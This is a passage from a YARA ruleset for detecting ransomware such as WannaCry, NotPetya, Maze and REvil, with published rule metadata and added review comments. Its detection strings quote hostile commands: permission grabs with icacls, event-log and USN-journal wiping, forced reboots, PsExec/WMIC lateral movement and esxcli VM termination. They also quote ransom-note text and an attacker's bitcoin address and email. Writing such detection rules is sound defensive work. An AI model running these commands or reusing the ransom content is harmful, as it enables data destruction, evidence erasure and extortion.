$s9 = "Global\\WINDOWS_TASKOSHT_MUTEX" $s10 = "Global\\WINDOWS_TASKCST_MUTEX" $s11 = {7461736B736368652E657865000000005461736B5374617274000000742E776E7279000069636163} $s12 = {6C73202E202F6772616E742045766572796F6E653A46202F54202F43202F5100617474726962202B68} $s13 = "WNcry@2ol7" $s14 = "wcry@123" $s15 = "Global\\MsWinZonesCacheCounterMutexA" condition: $s0 and $s1 and $s2 and $s3 or $s4 and $s5 and $s6 and $s7 or $s8 and $s9 and $s10 or $s11 and $s12 or $s13 or $s14 or $s15 } rule WannaCry_Ransomware { meta: description = "Detects WannaCry Ransomware" author = "Florian Roth (with the help of binar.ly)" reference = "https://goo.gl/HG2j5T" date = "2017-05-12" hash1 = "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" 
strings: $x1 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii $x2 = "taskdl.exe" fullword ascii $x3 = "tasksche.exe" fullword ascii $x4 = "Global\\MsWinZonesCacheCounterMutexA" fullword ascii $x5 = "WNcry@2ol7" fullword ascii $x6 = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" ascii $x7 = "mssecsvc.exe" fullword ascii $x8 = "C:\\%s\\qeriuwjhrf" fullword ascii $x9 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii $s1 = "C:\\%s\\%s" fullword ascii $s2 = "<!-- Windows 10 --> " fullword ascii $s3 = "cmd.exe /c \"%s\"" fullword ascii $s4 = "msg/m_portuguese.wnry" fullword ascii $s5 = "\\\\192.168.56.20\\IPC$" fullword wide $s6 = "\\\\172.16.99.5\\IPC$" fullword wide $op1 = { 10 ac 72 0d 3d ff ff 1f ac 77 06 b8 01 00 00 00 } $op2 = { 44 24 64 8a c6 44 24 65 0e c6 44 24 66 80 c6 44 } $op3 = { 18 df 6c 24 14 dc 64 24 2c dc 6c 24 5c dc 15 88 } $op4 = { 09 ff 76 30 50 ff 56 2c 59 59 47 3b 7e 0c 7c } $op5 = { c1 ea 1d c1 ee 1e 83 e2 01 83 e6 01 8d 14 56 } $op6 = { 8d 48 ff f7 d1 8d 44 10 ff 23 f1 23 c1 } condition: uint16(0) == 0x5a4d and filesize < 10000KB and ( 1 of ($x*) and 1 of ($s*) or 3 of ($op*) ) } rule WannaCry_Ransomware_Gen { meta: description = "Detects WannaCry Ransomware" author = "Florian Roth (based on rule by US CERT)" reference = "https://www.us-cert.gov/ncas/alerts/TA17-132A" date = "2017-05-12" hash1 = "9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05" hash2 = "8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df" hash3 = "4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359" strings: $s1 = "__TREEID__PLACEHOLDER__" fullword ascii $s2 = "__USERID__PLACEHOLDER__" fullword ascii $s3 = "Windows for Workgroups 3.1a" fullword ascii $s4 = "PC NETWORK PROGRAM 1.0" fullword ascii $s5 = "LANMAN1.0" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 5000KB and all of them } rule WannCry_m_vbs { meta: description = "Detects WannaCry Ransomware VBS" author = "Florian Roth" reference = 
"https://goo.gl/HG2j5T" date = "2017-05-12" hash1 = "51432d3196d9b78bdc9867a77d601caffd4adaa66dcac944a5ba0b3112bbea3b" strings: $x1 = ".TargetPath = \"C:\\@" ascii $x2 = ".CreateShortcut(\"C:\\@" ascii $s3 = " = WScript.CreateObject(\"WScript.Shell\")" ascii condition: ( uint16(0) == 0x4553 and filesize < 1KB and all of them ) } rule WannCry_BAT { meta: description = "Detects WannaCry Ransomware BATCH File" author = "Florian Roth" reference = "https://goo.gl/HG2j5T" date = "2017-05-12" hash1 = "f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077" strings: $s1 = "@.exe\">> m.vbs" ascii $s2 = "cscript.exe //nologo m.vbs" fullword ascii $s3 = "echo SET ow = WScript.CreateObject(\"WScript.Shell\")> " ascii $s4 = "echo om.Save>> m.vbs" fullword ascii condition: ( uint16(0) == 0x6540 and filesize < 1KB and 1 of them ) } rule WannaCry_RansomNote { meta: description = "Detects WannaCry Ransomware Note" author = "Florian Roth" reference = "https://goo.gl/HG2j5T" date = "2017-05-12" hash1 = "4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e" strings: $s1 = "A: Don't worry about decryption." fullword ascii $s2 = "Q: What's wrong with my files?" fullword ascii condition: ( uint16(0) == 0x3a51 and filesize < 2KB and all of them ) } /* Kaspersky Rule */ rule lazaruswannacry { meta: description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta" date = "2017-05-15" reference = "https://twitter.com/neelmehta/status/864164081116225536" author = "Costin G. 
Raiu, Kaspersky Lab" version = "1.0" hash = "9c7c7149387a1c79679a87dd1ba755bc" hash = "ac21c8ad899727137c4b94458d7aa8d8" strings: $a1 = { 51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75 04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01 46 56 E8 } $a2 = { 03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00 10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00 44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00 68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00 FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0 08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0 10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0 2B C0 2C C0 FF FE } condition: uint16(0) == 0x5A4D and filesize < 15000000 and all of them } /* Cylance Rule */ import "pe" rule WannaCry_Ransomware_Dropper { meta: description = "WannaCry Ransomware Dropper" reference = "https://www.cylance.com/en_us/blog/threat-spotlight-inside-the-wannacry-attack.html" date = "2017-05-12" strings: $s1 = "cmd.exe /c \"%s\"" fullword ascii $s2 = "tasksche.exe" fullword ascii $s3 = "icacls . 
/grant Everyone:F /T /C /Q" fullword ascii $s4 = "Global\\MsWinZonesCacheCounterMutexA" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 4MB and all of them } rule WannaCry_SMB_Exploit { meta: description = "WannaCry SMB Exploit" reference = "https://www.cylance.com/en_us/blog/threat-spotlight-inside-the-wannacry-attack.html" date = "2017-05-12" strings: $s1 = { 53 4D 42 72 00 00 00 00 18 53 C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FE 00 00 40 00 00 62 00 02 50 43 20 4E 45 54 57 4F 52 4B 20 50 52 4F 47 52 41 4D 20 31 2E 30 00 02 4C 41 4E 4D 41 4E 31 2E 30 00 02 57 69 6E 64 6F 77 73 20 66 6F 72 20 57 6F 72 6B 67 72 6F 75 70 73 20 33 2E 31 61 00 02 4C 4D 31 2E 32 58 30 30 32 00 02 4C 41 4E 4D 41 4E 32 2E 31 00 02 4E 54 20 4C 4D 20 30 2E 31 32 00 00 00 00 00 00 00 88 FF 53 4D 42 73 00 00 00 00 18 07 C0 } condition: uint16(0) == 0x5a4d and filesize < 4MB and all of them and pe.imports("ws2_32.dll", "connect") and pe.imports("ws2_32.dll", "send") and pe.imports("ws2_32.dll", "recv") and pe.imports("ws2_32.dll", "socket") and pe.imports("ws2_32.dll", "closesocket") } rule wannacry_static_ransom : wannacry_static_ransom { meta: description = "Detects WannaCryptor spreaded during 2017-May-12th campaign and variants" author = "Blueliv" reference = "https://blueliv.com/research/wannacrypt-malware-analysis/" date = "2017-05-15" strings: $mutex01 = "Global\\MsWinZonesCacheCounterMutexA" ascii $lang01 = "m_bulgarian.wnr" ascii $lang02 = "m_vietnamese.wnry" ascii $startarg01 = "StartTask" ascii $startarg02 = "TaskStart" ascii $startarg03 = "StartSchedule" ascii $wcry01 = "WanaCrypt0r" ascii wide $wcry02 = "WANACRY" ascii $wcry03 = "WANNACRY" ascii $wcry04 = "WNCRYT" ascii wide $forig01 = ".wnry\x00" ascii $fvar01 = ".wry\x00" ascii condition: ($mutex01 or any of ($lang*)) and ( $forig01 or all of ($fvar*) ) and any of ($wcry*) and any of ($startarg*) } rule wannacry_memory_ransom : wannacry_memory_ransom { meta: description = "Detects WannaCryptor spreaded 
during 2017-May-12th campaign and variants in memory" author = "Blueliv" reference = "https://blueliv.com/research/wannacrypt-malware-analysis/" date = "2017-05-15" strings: $s01 = "%08X.eky" $s02 = "%08X.pky" $s03 = "%08X.res" $s04 = "%08X.dky" $s05 = "@WanaDecryptor@.exe" condition: all of them } rule worm_ms17_010 : worm_ms17_010 { meta: description = "Detects Worm used during 2017-May-12th WannaCry campaign, which is based on ETERNALBLUE" author = "Blueliv" reference = "https://blueliv.com/research/wannacrypt-malware-analysis/" date = "2017-05-15" strings: $s01 = "__TREEID__PLACEHOLDER__" ascii $s02 = "__USERID__PLACEHOLDER__@" ascii $s03 = "SMB3" $s05 = "SMBu" $s06 = "SMBs" $s07 = "SMBr" $s08 = "%s -m security" ascii $s09 = "%d.%d.%d.%d" $payloadwin2000_2195 = "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00" $payload2000_50 = "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00\x2e\x00\x30\x00\x00\x00" condition: all of them } rule Maze { meta: description = "Identifies Maze ransomware in memory or unpacked." author = "@bartblaze" date = "2019-11" tlp = "White" strings: $ = "Enc: %s" ascii wide $ = "Encrypting whole system" ascii wide $ = "Encrypting specified folder in --path parameter..." ascii wide $ = "!Finished in %d ms!" ascii wide $ = "--logging" ascii wide $ = "--nomutex" ascii wide $ = "--noshares" ascii wide $ = "--path" ascii wide $ = "Logging enabled | Maze" ascii wide $ = "NO SHARES | " ascii wide $ = "NO MUTEX | " ascii wide $ = "Encrypting:" ascii wide $ = "You need to buy decryptor in order to restore the files." ascii wide $ = "Dear %s, your files have been encrypted by RSA-2048 and ChaCha algorithms" ascii wide $ = "%s! Alert! %s! Alert! Dear %s Your files have been encrypted by %s! Attention! 
%s" ascii wide $ = "DECRYPT-FILES.txt" ascii wide fullword condition: 5 of them } rule ransomware_PetrWrap { meta: copyright= "Kaspersky Lab" description = "Rule to detect PetrWrap ransomware samples" reference = "https://securelist.com/schroedingers-petya/78870/" last_modified = "2017-06-27" author = "Kaspersky Lab" hash = "71B6A493388E7D0B40C83CE903BC6B04" version = "1.0" strings: $a1 = "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcqYLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgqCXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu" fullword wide $a2 = ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls" fullword wide $a3 = "DESTROY ALL OF YOUR DATA PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED" fullword ascii $a4 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" fullword ascii $a5 = "wowsmith123456posteo.net." fullword wide condition: uint16(0) == 0x5A4D and filesize < 1000000 and any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
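*/

/*
    Yara Rule Set
    Author: Florian Roth
    Date: 2016-03-24
    Identifier: Petya Ransomware
*/

/* Rule Set ----------------------------------------------------------------- */

// Petya dropper wrapped in a WinRAR self-extracting stub: the SFX marker ($a1)
// is mandatory and three of the supporting strings ($s*) must also be present.
rule Petya_Ransomware
{
    meta:
        description = "Detects Petya Ransomware"
        author = "Florian Roth"
        reference = "http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html"
        date = "2016-03-24"
        hash = "26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739"
    strings:
        // Anchor: literal WinRAR SFX module marker.
        $a1 = "<description>WinRAR SFX module</description>" fullword ascii
        // Supporting strings, any three required.
        $s1 = "BX-Proxy-Manual-Auth" fullword wide
        $s2 = "<!--The ID below indicates application support for Windows 10 -->" fullword ascii
        $s3 = "X-HTTP-Attempts" fullword wide
        $s4 = "@CommandLineMode" fullword wide
        $s5 = "X-Retry-After" fullword wide
    condition:
        // MZ header plus size cap: this is a file-oriented rule and will not
        // fire on a memory region that does not start with the PE header.
        uint16(0) == 0x5a4d and filesize < 500KB and $a1 and 3 of ($s*)
}

// Three raw byte sequences (they look like x86 code, not verified) that must all
// be present. Code-byte signatures are build-specific and will not survive a
// recompilation or a different packer stage.
rule Ransom_Petya
{
    meta:
        description = "Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015"
        author = "CCN-CERT"
        version = "1.0"
    strings:
        $a1 = { C1 C8 14 2B F0 03 F0 2B F0 03 F0 C1 C0 14 03 C2 }
        $a2 = { 46 F7 D8 81 EA 5A 93 F0 12 F7 DF C1 CB 10 81 F6 }
        $a3 = { 0C 88 B9 07 87 C6 C1 C3 01 03 C5 48 81 C3 A3 01 00 00 }
    condition:
        all of them
}

// FireEye NotPetya rule. Four independent string families (drive access,
// ransom note, API names, lateral-movement/anti-forensics commands) each need a
// minimum hit count, so no single generic string can trigger it on its own.
rule FE_CPE_MS17_010_RANSOMWARE
{
    meta:
        version = "1.1"
        // filetype = "PE"
        author = "Ian.Ahl@fireeye.com @TekDefense, Nicholas.Carr@mandiant.com @ItsReallyNick"
        date = "2017-06-27"
        description = "Probable PETYA ransomware using ETERNALBLUE, WMIC, PsExec"
        reference = "https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html"
    strings:
        // DRIVE USAGE: raw physical-drive paths, admin share and drive enumeration APIs.
        $dmap01 = "\\\\.\\PhysicalDrive" nocase ascii wide
        $dmap02 = "\\\\.\\PhysicalDrive0" nocase ascii wide
        $dmap03 = "\\\\.\\C:" nocase ascii wide
        $dmap04 = "TERMSRV" nocase ascii wide
        $dmap05 = "\\admin$" nocase ascii wide
        $dmap06 = "GetLogicalDrives" nocase ascii wide
        $dmap07 = "GetDriveTypeW" nocase ascii wide

        // RANSOMNOTE: fake CHKDSK screen and payment instructions.
        $msg01 = "WARNING: DO NOT TURN OFF YOUR PC!" nocase ascii wide
        $msg02 = "IF YOU ABORT THIS PROCESS" nocase ascii wide
        $msg03 = "DESTROY ALL OF YOUR DATA!" nocase ascii wide
        $msg04 = "PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED" nocase ascii wide
        $msg05 = "your important files are encrypted" ascii wide
        $msg06 = "Your personal installation key" nocase ascii wide
        $msg07 = "worth of Bitcoin to following address" nocase ascii wide
        $msg08 = "CHKDSK is repairing sector" nocase ascii wide
        $msg09 = "Repairing file system on " nocase ascii wide
        $msg10 = "Bitcoin wallet ID" nocase ascii wide
        $msg11 = "wowsmith123456@posteo.net" nocase ascii wide
        $msg12 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" nocase ascii wide
        // NOTE(review): this regex matches "encryption"/"decryption"/"encrypted."
        // in almost any binary and is counted by the `$msg*` wildcard below, so
        // it supplies one of the two required $msg hits by itself. The other
        // three families are what actually discriminate.
        $msg_pcre = /(en|de)crypt(ion|ed\.)/

        // FUNCTIONALITY, APIS: ordinary imports, hence the high threshold (9 of 15).
        $functions01 = "need dictionary" nocase ascii wide
        $functions02 = "comspec" nocase ascii wide
        $functions03 = "OpenProcessToken" nocase ascii wide
        $functions04 = "CloseHandle" nocase ascii wide
        $functions05 = "EnterCriticalSection" nocase ascii wide
        $functions06 = "ExitProcess" nocase ascii wide
        $functions07 = "GetCurrentProcess" nocase ascii wide
        $functions08 = "GetProcAddress" nocase ascii wide
        $functions09 = "LeaveCriticalSection" nocase ascii wide
        $functions10 = "MultiByteToWideChar" nocase ascii wide
        $functions11 = "WideCharToMultiByte" nocase ascii wide
        $functions12 = "WriteFile" nocase ascii wide
        $functions13 = "CoTaskMemFree" nocase ascii wide
        $functions14 = "NamedPipe" nocase ascii wide
        $functions15 = "Sleep" nocase ascii wide // imported, not in strings

        // COMMANDS
        // -- Clearing event logs & USNJrnl (anti-forensics)
        $cmd01 = "wevtutil cl Setup" ascii wide nocase
        $cmd02 = "wevtutil cl System" ascii wide nocase
        $cmd03 = "wevtutil cl Security" ascii wide nocase
        $cmd04 = "wevtutil cl Application" ascii wide nocase
        $cmd05 = "fsutil usn deletejournal" ascii wide nocase
        // -- Scheduled task and forced reboot
        $cmd06 = "schtasks " nocase ascii wide
        $cmd07 = "/Create /SC " nocase ascii wide
        $cmd08 = " /TN " nocase ascii wide
        $cmd09 = "at %02d:%02d %ws" nocase ascii wide
        $cmd10 = "shutdown.exe /r /f" nocase ascii wide
        // -- Sysinternals/PsExec and WMIC (lateral movement)
        $cmd11 = "-accepteula -s" nocase ascii wide
        $cmd12 = "wmic" // ascii only, no nocase: unlike its siblings (kept as published)
        $cmd13 = "/node:" nocase ascii wide
        $cmd14 = "process call create" nocase ascii wide
    condition:
        // The MZ check is commented out in the published rule, which keeps it
        // usable on memory regions; re-enable it for file-only scanning.
        // (uint16(0) == 0x5A4D)
        3 of ($dmap*) and 2 of ($msg*) and 9 of ($functions*) and 7 of ($cmd*)
}

// Blueliv rule for the 2017-06-28 spreading Petya variant: scheduled-task,
// PsExec and WMIC command templates, one ransom-note fragment and the first
// bytes of the boot-sector payload. Every string is required.
rule petya_eternalblue : petya_eternalblue
{
    meta:
        author = "blueliv"
        description = "Based on spreading petya version: 2017-06-28"
        reference = "https://blueliv.com/petya-ransomware-cyber-attack-is-spreading-across-the-globe-part-2/"
    strings:
        /* Some commands executed by the Petya variant */
        $cmd01 = "schtasks %ws/Create /SC once /TN \"\" /TR \"%ws\" /ST %02d:%0" wide
        $cmd02 = "shutdown.exe /r /f" wide
        $cmd03 = "%s \\\\%s -accepteula -s" wide
        $cmd04 = "process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\%s\\\" #1" wide
        /* Strings of encrypted files */
        $str01 = "they have been encrypted. Perhaps you are busy looking" wide
        /* MBR/VBR payload: 0x55AA boot signature followed by a near jmp (e9) */
        $mbr01 = { 00 00 00 55 aa e9 ?? ?? }
    condition:
        all of them
}

// Pico (a Thanatos build, per the PDB path and User-Agent): PDB path, per-folder
// ransom-note paths and the taskkill command. All strings required, so the
// generic MSVC runtime string $s13 does not widen the rule.
rule pico_ransomware
{
    meta:
        description = "Rule to detect Pico Ransomware"
        author = "Marc Rivero | @seifreed"
        reference = "https://twitter.com/siri_urz/status/1035138577934557184"
    strings:
        $s1 = "C:\\Users\\rikfe\\Desktop\\Ransomware\\ThanatosSource\\Release\\Ransomware.pdb" fullword ascii
        $s2 = "\\Downloads\\README.txt" fullword ascii
        $s3 = "\\Music\\README.txt" fullword ascii
        $s4 = "\\Videos\\README.txt" fullword ascii
        $s5 = "\\Pictures\\README.txt" fullword ascii
        $s6 = "\\Desktop\\README.txt" fullword ascii
        $s7 = "\\Documents\\README.txt" fullword ascii
        $s8 = "/c taskkill /im " fullword ascii
        $s9 = "\\AppData\\Roaming\\" fullword ascii
        $s10 = "gMozilla/5.0 (Windows NT 6.1) Thanatos/1.1" fullword wide
        $s11 = "AppData\\Roaming" fullword ascii
        $s12 = "\\Downloads" fullword ascii
        $s13 = "operator co_await" fullword ascii
    condition:
        ( uint16(0) == 0x5a4d and filesize < 700KB ) and all of them
}

// REvil/Revix Linux (ESXi) encryptor. Usage text, esxcli VM enumeration and
// the encryption status messages. ELF magic (7F 45 read little-endian as
// 0x457f) plus a size cap, four usage/helper strings and two status strings.
rule Revil_Ransomware : ransomware
{
    meta:
        author = "Josh Lemon"
        description = "Detects REvil Linux - Revix 1.1 and 1.2"
        reference = "https://angle.ankura.com/post/102hcny/revix-linux-ransomware"
        date = "2021-11-04"
        version = "1.1"
        hash1 = "f864922f947a6bb7d894245b53795b54b9378c0f7633c521240488e86f60c2c5"
        hash2 = "559e9c0a2ef6898fabaf0a5fb10ac4a0f8d721edde4758351910200fe16b5fa7"
        hash3 = "ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4"
    strings:
        $s1 = "Usage example: elf.exe --path /vmfs/ --threads 5" fullword ascii
        $s2 = "uname -a && echo \" | \" && hostname" fullword ascii
        $s3 = "esxcli --formatter=csv --format-param=fields==\"WorldID,DisplayName\" vm process list" ascii
        $s4 = "awk -F \"\\\"*,\\\"*\" '{system(\"esxcli" ascii
        $s5 = "--silent (-s) use for not stoping VMs mode" fullword ascii
        $s6 = "!!!BY DEFAULT THIS SOFTWARE USES 50 THREADS!!!" fullword ascii
        $s7 = "%d:%d: Comment not allowed here" fullword ascii
        $s8 = "Error decoding user_id %d " fullword ascii
        $s9 = "Error read urandm line %d!" fullword ascii
        $s10 = "%d:%d: Unexpected `%c` in comment opening sequence" fullword ascii
        $s11 = "%d:%d: Unexpected EOF in block comment" fullword ascii
        $s12 = "Using silent mode, if you on esxi - stop VMs manualy" fullword ascii
        $s13 = "rand: try to read %hu but get %lu bytes" fullword ascii
        $s14 = "Revix" fullword ascii
        $s15 = "without --path encrypts current dir" fullword ascii
        // Encryption progress / status messages.
        $e1 = "[%s] already encrypted" fullword ascii
        $e2 = "File [%s] was encrypted" fullword ascii
        $e3 = "File [%s] was NOT encrypted" fullword ascii
        $e4 = "Encrypting [%s]" fullword ascii
    condition:
        uint16(0) == 0x457f and filesize < 300KB and ( 4 of ($s*) and 2 of ($e*) )
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// Satana. Hex strings decode to: $a "!satana!.txt" (UTF-16LE), $b "tgwyugwq",
// $c "Swvwngu", $d "EnumLocalRes", $e "WNetOpenEnumW\0", $f "!SATANA!".
rule Ransom_Satana
{
    meta:
        description = "Regla para detectar Ransom.Satana"
        author = "CCN-CERT"
        version = "1.0"
    strings:
        $a = { 21 00 73 00 61 00 74 00 61 00 6E 00 61 00 21 00 2E 00 74 00 78 00 74 00 00 }
        $b = { 74 67 77 79 75 67 77 71 }
        $c = { 53 77 76 77 6E 67 75 }
        $d = { 45 6E 75 6D 4C 6F 63 61 6C 52 65 73 }
        $e = { 57 4E 65 74 4F 70 65 6E 45 6E 75 6D 57 00 }
        $f = { 21 53 41 54 41 4E 41 21 }
    condition:
        // Parentheses make the published precedence explicit: `and` binds
        // tighter than `or`, so $b ALONE satisfies the rule and $c needs the
        // other four. NOTE(review): if $b/$c are two variant markers the intent
        // was probably `($b or $c) and $d and $a and $e and $f`; confirm against
        // samples before tightening, as that would change which files match.
        $b or ($c and $d and $a and $e and $f)
}

// Satana dropper: $a "%s-TryExcept", $b PDB path "d:\lbetwmwy\uijeuqplfwub.pdb",
// $c "qfntvthb". All three required.
rule Ransom_Satana_Dropper
{
    meta:
        description = "Regla para detectar el dropper de Ransom.Satana"
        author = "CCN-CERT"
        version = "1.0"
    strings:
        $a = { 25 73 2D 54 72 79 45 78 63 65 70 74 }
        $b = { 64 3A 5C 6C 62 65 74 77 6D 77 79 5C 75 69 6A 65 75 71 70 6C 66 77 75 62 2E 70 64 62 }
        $c = { 71 66 6E 74 76 74 68 62 }
    condition:
        all of them
}

// Unpacked Shiva (.NET, per the obj\Debug PDB path). PDB path, ransom-note
// sentences and a few extension names; every string is required, so this is a
// tight, low-FP rule that only matches this exact build's strings.
rule unpacked_shiva_ransomware
{
    meta:
        description = "Rule to detect an unpacked sample of Shiva ransopmw"
        author = "Marc Rivero | @seifreed"
        reference = "https://twitter.com/malwrhunterteam/status/1037424962569732096"
    strings:
        $s1 = "c:\\Users\\sys\\Desktop\\v 0.5\\Shiva\\Shiva\\obj\\Debug\\shiva.pdb" fullword ascii
        $s2 = "This email will be as confirmation you are ready to pay for decryption key." fullword wide
        $s3 = "Your important files are now encrypted due to a security problem with your PC!" fullword wide
        $s4 = "write.php?info=" fullword wide
        $s5 = " * Do not try to decrypt your data using third party software, it may cause permanent data loss." fullword wide
        $s6 = " * Do not rename encrypted files." fullword wide
        $s7 = ".compositiontemplate" fullword wide
        $s8 = "You have to pay for decryption in Bitcoins. The price depends on how fast you write to us." fullword wide
        $s9 = "\\READ_IT.txt" fullword wide
        $s10 = ".lastlogin" fullword wide
        $s11 = ".logonxp" fullword wide
        $s12 = " * Decryption of your files with the help of third parties may cause increased price" fullword wide
        $s13 = "After payment we will send you the decryption tool that will decrypt all your files." fullword wide
    condition:
        ( uint16(0) == 0x5a4d and filesize < 800KB ) and all of them
}

// Sigma check-in: the full set of HTTP query parameter names the sample sends.
// Written for memory scanning (no header check). NOTE(review): the parameters
// are generic beacon fields; other malware using the same template would also
// match, so treat hits as a lead rather than an attribution.
rule sigma_ransomware
{
    meta:
        author = "J from THL <j@techhelplist.com>"
        date = "20180509"
        reference1 = "https://www.virustotal.com/#/file/705ad78bf5503e6022f08da4c347afb47d4e740cfe6c39c08550c740c3be96ba"
        reference2 = "https://www.virustotal.com/#/file/bb3533440c27a115878ae541aba3bda02d441f3ea1864b868862255aabb0c8ff"
        version = 1
        maltype = "Ransomware"
        filetype = "memory"
    strings:
        $a = ".php?"
        $b = "uid="
        $c = "&uname="
        $d = "&os="
        $e = "&pcname="
        $f = "&total="
        $g = "&country="
        $h = "&network="
        $i = "&subid="
    condition:
        all of them
}

// Snake (EKANS) ransomware, a 32-bit Go binary. Keyed on the exact Go build ID
// plus two code-byte patterns that include relative call offsets (E8 xx xx xx xx),
// so it matches one specific build only. The $math_rand_seed_calling bytes also
// appear verbatim inside $encryption_function, so `all of them` is effectively
// `$go_build_id and $encryption_function`.
// Fix: the meta key was "Data"; it is "date" everywhere else in this file.
rule SnakeRansomware
{
    meta:
        author = "Nishan Maharjan"
        description = "A yara rule to catch snake ransomware"
        reference = "https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017"
        date = "15th May 2020"
    strings:
        $go_build_id = "Go build ID: \"X6lNEpDhc_qgQl56x4du/fgVJOqLlPCCIekQhFnHL/rkxe6tXCg56Ez88otHrz/Y-lXW-OhiIbzg3-ioGRz\""
        $math_rand_seed_calling = { 89 C8 BB 00 CA 9A 3B 89 D1 F7 E3 81 E1 FF FF FF 3F 89 C3 01 C8 89 C6 05 00 00 1A 3D 89 04 24 69 ED 00 CA 9A 3B 01 EA 89 CD C1 F9 1F 01 EB 11 CA 81 C6 00 00 1A 3D 81 D2 EB 03 B2 A1 89 54 24 04 E8 10 62 F6 FF }
        $encryption_function = { 64 8B 0D 14 00 00 00 8B 89 00 00 00 00 3B 61 08 0F 86 38 01 00 00 83 EC 3C E8 32 1A F3 FF 8D 7C 24 28 89 E6 E8 25 EA F0 FF 8B 44 24 2C 8B 4C 24 28 89 C2 C1 E8 1F C1 E0 1F 85 C0 0F 84 FC 00 00 00 D1 E2 89 CB C1 E9 1F 09 D1 89 DA D1 E3 C1 EB 1F 89 CD D1 E1 09 D9 89 CB 81 C1 80 7F B1 D7 C1 ED 1F 81 C3 80 7F B1 D7 83 D5 0D 89 C8 BB 00 CA 9A 3B 89 D1 F7 E3 81 E1 FF FF FF 3F 89 C3 01 C8 89 C6 05 00 00 1A 3D 89 04 24 69 ED 00 CA 9A 3B 01 EA 89 CD C1 F9 1F 01 EB 11 CA 81 C6 00 00 1A 3D 81 D2 EB 03 B2 A1 89 54 24 04 E8 10 62 F6 FF 31 C0 EB 79 89 44 24 20 8B 4C 24 40 8D 14 C1 8B 1A 89 5C 24 24 8B 52 04 89 54 24 1C C7 04 24 05 00 00 00 E8 48 FE FF FF 8B 44 24 08 8B 4C 24 04 C7 04 24 00 00 00 00 8B 54 24 24 89 54 24 04 8B 5C 24 1C 89 5C 24 08 89 4C 24 0C 89 44 24 10 E8 EC DD EF FF 8B 44 24 18 8B 4C 24 14 89 4C 24 08 89 44 24 0C 8B 44 24 24 89 04 24 8B 44 24 1C 89 44 24 04 E8 68 BB F3 FF 8B 44 24 20 40 }
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.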
*/

import "pe"

// Stampado: a structural rule with no strings. It checks the PE characteristics
// word, the section count, one import, and that the first byte after the last
// section's raw data (i.e. the start of the overlay) is 0x0d ('\r').
// Assumption (not checked here): section 4 is also the one with the highest raw
// offset, otherwise the computed offset is not the overlay start.
// If that offset lies beyond the file, uint8() is undefined and the rule is false.
rule stampado_overlay
{
    meta:
        description = "Catches Stampado samples looking for \\r at the beginning of PE overlay section"
        reference = ""
        author = "Fernando Merces, FTR, Trend Micro"
        date = "2016-07"
